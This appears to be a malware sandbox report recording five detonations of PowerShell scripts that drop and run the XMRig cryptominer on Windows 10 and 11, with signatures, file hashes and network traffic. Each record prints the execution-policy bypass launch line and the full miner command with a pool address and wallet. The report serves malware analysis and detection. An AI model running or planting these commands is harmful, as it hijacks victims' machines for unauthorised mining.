memory/1676-88-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-89-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-90-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-91-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-92-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-93-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-94-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-95-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-96-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-97-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-98-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-99-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-100-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-101-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-102-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-103-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-104-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-105-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-106-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-107-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-108-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-109-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-110-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-111-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-112-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-113-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-114-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-115-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-116-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-117-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-118-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:31

Platform

win10-20240404-en

Max time kernel

1793s

Max time network

1787s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows: no description, indicator, process or target was recorded for any match)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nfhyoskn.b45.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:53

Platform

win11-20240426-en

Max time kernel

1797s

Max time network

1778s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s3map0eu.in3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:43

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1781s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_opdv0kve.3ch.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:46

Platform

win10v2004-20240426-en

Max time kernel

1792s

Max time network

1767s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1oluqplz.xgf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:01

Platform

win10-20240404-en

Max time kernel

1795s

Max time network

1747s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xcftyytu.yec.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3
